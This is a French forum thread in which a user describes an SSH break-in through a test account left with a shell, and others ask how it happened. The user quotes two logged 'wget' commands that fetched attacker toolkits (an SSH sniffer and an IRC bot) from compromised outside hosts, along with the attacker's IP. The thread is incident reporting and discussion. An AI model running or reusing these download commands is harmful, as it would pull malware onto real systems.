[je laisse au soins du moderateur d'enlever les url s'il estime que ce
n'est pas nesseçaire].
bonjour tout le monde.
suite à une erreur de manip dans les cordons,je me suis retrouvé avec
une machine trés ouverte coté internet et evidement un vilain en a
profité .....
le trou etait un AllowedUser non rempli avec ssh,ce qui fait que le
mechant est entré avec un compte systeme,en l'occurence squid ;(.
elle n'est pas resté longtemps en place,environ 6 heures ce qui prouve
que les vilains sont à l'affut de tout.
en gros,dans les logs,je vois que le pirate à utiliser un site web
defacé.
à savoir:
wget koigardens.biz/images/.dt/t3.tgz
ça vaut-il le coup de s'embeter à les prevenir ?.
un autre site utilisé est:
wget squad.1accesshost.com/t3.tgz
même question ?.
l'ip de l'attaquant est 82.79.145.149 en roumanie apparement.
bref là,je suppose que c'est pisser dans un violon,surtout que ce
n'est peut être pas la machine du pirate.
le monsieur a donc recuperé un sniffeur ssh et un robot IRC.
le sniffeur ssh est un binaire linux statique mais le robot est arrivé
avec les sources
si ça interesse quelqu'un pour etude ? (bien que je suppose que ce ne
doit pas être du tout neuf)
ya plus qu'a formater bien que j'ai l'impression de n'avoir été
qu'un relai de snif ssh pendant 2 heures ?.
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire
Veuillez sélectionner un problème
Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
Damien Wyart
le trou etait un AllowedUser non rempli avec ssh,ce qui fait que le mechant est entré avec un compte systeme,en l'occurence squid ;(.
Si c'est un compte système, il ne doit pas être autorisé à avoir un shell, non ? Est-ce que quelqu'un aurait plus d'infos sur comment ce type de chose est possible ?
-- DW
le trou etait un AllowedUser non rempli avec ssh,ce qui fait que le
mechant est entré avec un compte systeme,en l'occurence squid ;(.
Si c'est un compte système, il ne doit pas être autorisé à avoir un
shell, non ? Est-ce que quelqu'un aurait plus d'infos sur comment ce
type de chose est possible ?
le trou etait un AllowedUser non rempli avec ssh,ce qui fait que le mechant est entré avec un compte systeme,en l'occurence squid ;(.
Si c'est un compte système, il ne doit pas être autorisé à avoir un shell, non ? Est-ce que quelqu'un aurait plus d'infos sur comment ce type de chose est possible ?
-- DW
Eric Stern
Damien Wyart disait:
le trou etait un AllowedUser non rempli avec ssh,ce qui fait que le mechant est entré avec un compte systeme,en l'occurence squid ;(.
Si c'est un compte système, il ne doit pas être autorisé à avoir un shell, non ? Est-ce que quelqu'un aurait plus d'infos sur comment ce type de chose est possible ?
cette becane etait vraiment ouverte à tout vent,squid avait droit à un shell.(j'avais dit compte système car le compte avait été crée pour faire des essais avec squid).
cette pauvre becane n'etait vraiment pas destiné à etre raccordé à quoique ce soit ;(.
Eric
Damien Wyart disait:
le trou etait un AllowedUser non rempli avec ssh,ce qui fait que le
mechant est entré avec un compte systeme,en l'occurence squid ;(.
Si c'est un compte système, il ne doit pas être autorisé à avoir un
shell, non ? Est-ce que quelqu'un aurait plus d'infos sur comment ce
type de chose est possible ?
cette becane etait vraiment ouverte à tout vent,squid avait droit à un
shell.(j'avais dit compte système car le compte avait été crée pour faire
des essais avec squid).
cette pauvre becane n'etait vraiment pas destiné à etre raccordé à quoique
ce soit ;(.
le trou etait un AllowedUser non rempli avec ssh,ce qui fait que le mechant est entré avec un compte systeme,en l'occurence squid ;(.
Si c'est un compte système, il ne doit pas être autorisé à avoir un shell, non ? Est-ce que quelqu'un aurait plus d'infos sur comment ce type de chose est possible ?
cette becane etait vraiment ouverte à tout vent,squid avait droit à un shell.(j'avais dit compte système car le compte avait été crée pour faire des essais avec squid).
cette pauvre becane n'etait vraiment pas destiné à etre raccordé à quoique ce soit ;(.
